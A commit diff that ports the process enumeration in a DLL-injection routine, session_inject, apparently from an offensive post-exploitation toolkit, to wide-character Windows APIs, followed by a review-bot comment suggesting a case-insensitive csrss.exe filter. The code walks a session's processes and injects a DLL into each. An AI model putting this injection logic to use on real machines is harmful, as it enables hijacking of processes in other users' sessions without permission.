
Process Unicode support

This commit is contained in:
cn-kali-team 2020-04-05 11:52:08 +08:00
parent 348aa69f68
commit a8df9b3604

@ -114,13 +114,13 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer, char * cpComma
{ {
DWORD dwResult = ERROR_INVALID_HANDLE; DWORD dwResult = ERROR_INVALID_HANDLE;
CREATETOOLHELP32SNAPSHOT pCreateToolhelp32Snapshot = NULL; CREATETOOLHELP32SNAPSHOT pCreateToolhelp32Snapshot = NULL;
PROCESS32FIRST pProcess32First = NULL; PROCESS32FIRSTW pProcess32FirstW = NULL;
PROCESS32NEXT pProcess32Next = NULL; PROCESS32NEXTW pProcess32NextW = NULL;
HANDLE hProcessSnap = NULL; HANDLE hProcessSnap = NULL;
HMODULE hKernel = NULL; HMODULE hKernel = NULL;
HANDLE hToken = NULL; HANDLE hToken = NULL;
BOOL bUseBruteForce = TRUE; BOOL bUseBruteForce = TRUE;
PROCESSENTRY32 pe32 = {0}; PROCESSENTRY32W pe32 = {0};
do do
{ {
@ -146,19 +146,19 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer, char * cpComma
break; break;
pCreateToolhelp32Snapshot = (CREATETOOLHELP32SNAPSHOT)GetProcAddress( hKernel, "CreateToolhelp32Snapshot" ); pCreateToolhelp32Snapshot = (CREATETOOLHELP32SNAPSHOT)GetProcAddress( hKernel, "CreateToolhelp32Snapshot" );
pProcess32First = (PROCESS32FIRST)GetProcAddress( hKernel, "Process32First" ); pProcess32FirstW = (PROCESS32FIRSTW)GetProcAddress( hKernel, "Process32FirstW" );
pProcess32Next = (PROCESS32NEXT)GetProcAddress( hKernel, "Process32Next" ); pProcess32NextW = (PROCESS32NEXTW)GetProcAddress( hKernel, "Process32NextW" );
if( !pCreateToolhelp32Snapshot || !pProcess32First || !pProcess32Next ) if( !pCreateToolhelp32Snapshot || !pProcess32FirstW || !pProcess32NextW )
break; break;
hProcessSnap = pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); hProcessSnap = pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( hProcessSnap == INVALID_HANDLE_VALUE ) if( hProcessSnap == INVALID_HANDLE_VALUE )
break; break;
pe32.dwSize = sizeof( PROCESSENTRY32 ); pe32.dwSize = sizeof( PROCESSENTRY32W );
if( !pProcess32First( hProcessSnap, &pe32 ) ) if( !pProcess32FirstW( hProcessSnap, &pe32 ) )
break; break;
bUseBruteForce = FALSE; bUseBruteForce = FALSE;
@ -169,7 +169,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer, char * cpComma
{ {
// On Windows 2008R2 we Blue Screen the box if we inject via APC injection // On Windows 2008R2 we Blue Screen the box if we inject via APC injection
// into the target sessions instance of csrss.exe!!! so we filter it out... // into the target sessions instance of csrss.exe!!! so we filter it out...
if( strstr( pe32.szExeFile, "csrss.exe" ) ) if (wcsstr(pe32.szExeFile, L"csrss.exe"))
continue; continue;
dwResult = ps_inject( pe32.th32ProcessID, pDllBuffer, cpCommandLine ); dwResult = ps_inject( pe32.th32ProcessID, pDllBuffer, cpCommandLine );
@ -179,7 +179,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer, char * cpComma
break; break;
} }
} }
} while( pProcess32Next( hProcessSnap, &pe32 ) ); } while( pProcess32NextW( hProcessSnap, &pe32 ) );
} while( 0 ); } while( 0 );
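Review bot: The csrss.exe filter on the new `if (wcsstr(pe32.szExeFile, L"csrss.exe"))` line in the third hunk is a case-sensitive substring match, so an image name reported with different casing (e.g. `CSRSS.EXE`) would pass the filter and the APC injection the comment warns about would still be attempted against that session's csrss, with the 2008R2 blue screen as the consequence; Windows image names are case-insensitive, so this should be `if (_wcsicmp(pe32.szExeFile, L"csrss.exe") == 0)`. An exact compare also stops an unrelated process whose name merely contains `csrss.exe` from being skipped, which may or may not have been intended by the original strstr — worth confirming before narrowing it. In the second hunk the switch to resolving `Process32FirstW`/`Process32NextW` through GetProcAddress means a target whose kernel32 lacks the wide exports now fails the NULL check and falls through to the brute-force path instead of the snapshot walk; if that is the intended fallback, a one-line comment such as `// no wide toolhelp exports: fall back to brute-force PID scan` next to the lookup would save the next reader a question. session_inject starts before the first hunk and ends after the last one.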